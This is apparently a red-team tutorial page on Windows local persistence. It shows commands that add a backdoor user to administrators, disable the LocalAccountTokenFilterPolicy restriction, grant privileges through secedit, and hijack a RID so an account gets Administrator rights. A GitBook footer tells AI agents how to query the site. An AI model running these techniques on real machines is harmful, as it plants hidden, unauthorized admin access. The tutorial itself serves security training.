> For the complete documentation index, see [llms.txt](https://notes.dollarboysushil.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.dollarboysushil.com/beyond-oscp-cpts/red-teaming/windows-local-persistence/tampering-with-unprivileged-accounts.md).

# Tampering With Unprivileged Accounts

Once we get the administrator's access, we need to achive persistence in machine so that  it is harder for the blue team to detect us.

## Assign Group Membership

```
C:\> net localgroup administrators newuser1 /add
```

Now we can use `newuser1`to access the machine as administrator. Due to `LocalAccountTokenFilterPolicy` feature of UAC, administrative privileges are stripped out of any local account when logging in remotely.

To regain the administration privilges for our user we have to disable `LocalAccountTokenFilterPolicy` by changing the following registry key to 1.

```
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```

## Special Privileges and Security Descriptors

We can add a user to certain groups without modifying any group membership. \
For this, we will export current configuration to a temporary file.

```
secedit /export /cfg config.inf
```

Then we add the user to the desired groups.

<figure><img src="/files/LRGRUgYAWZEOpFATBlQX" alt=""><figcaption></figcaption></figure>

Then we convert the .inf file to .sdb to load the configuration back to the system.

```
secedit /import /cfg config.inf /db config.sdb

secedit /configure /db config.sdb /cfg config.inf
```

## RID Hijacking

When a new user is created on a Windows system, they are assigned a unique identifier known as the Relative Identifier (RID). This numeric value helps the system recognize and differentiate users. During the login process, the LSASS (Local Security Authority Subsystem Service) retrieves the user's RID from the SAM (Security Account Manager) registry hive and uses it to generate an access token. By manipulating this registry value, it’s possible to trick the system into assigning an unprivileged user the access token of an Administrator—effectively granting elevated privileges.

On Windows systems, the built-in Administrator account is always assigned the RID 500, while standard user accounts typically receive RIDs starting from 1000.

To change the RID of target user first identify the current RID.

```
C:\> wmic useraccount get name,sid

Name                SID
Administrator       S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount      S-1-5-21-1966530601-3185510712-10604624-503
Guest               S-1-5-21-1966530601-3185510712-10604624-501
newuser1            S-1-5-21-1966530601-3185510712-10604624-1008
newuser2            S-1-5-21-1966530601-3185510712-10604624-1009
newuser3            S-1-5-21-1966530601-3185510712-10604624-1010
```

we want to change RID of `newuser3` from 1010 to 500.\
In registry Editor rid are stored in hex (1010 = 0x3F2) in little-endin notation (3F2 = F2 03)

<figure><img src="/files/GZWQJoaLnDh1JbKZoP25" alt=""><figcaption></figcaption></figure>

Then, changing to RID 500 (0x01F4) in little-endian (F401):<br>

<figure><img src="/files/ttE8V2VZM1ZwLnXcx5Yi" alt=""><figcaption></figcaption></figure>

`newuser3`is now administrator


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://notes.dollarboysushil.com/beyond-oscp-cpts/red-teaming/windows-local-persistence/tampering-with-unprivileged-accounts.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.